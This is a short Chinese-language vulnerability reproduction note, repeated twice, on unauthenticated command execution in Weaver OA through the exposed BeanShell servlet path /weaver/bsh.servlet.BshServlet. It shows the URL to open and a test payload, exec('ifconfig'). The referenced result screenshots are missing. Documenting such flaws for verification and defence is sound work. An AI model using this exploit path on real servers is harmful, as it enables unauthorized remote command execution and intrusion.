攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令
访问:url/weaver/bsh.servlet.BshServlet
执行:exec(“ifconfig”)
复现:
访问
http://url/weaver/bsh.servlet.BshServlet
得到:
直接输入exec(“ifconfig”),得到:
复现完毕;
攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令
访问:url/weaver/bsh.servlet.BshServlet
执行:exec(“ifconfig”)
复现:
访问
http://url/weaver/bsh.servlet.BshServlet
得到:
直接输入exec(“ifconfig”),得到:
复现完毕;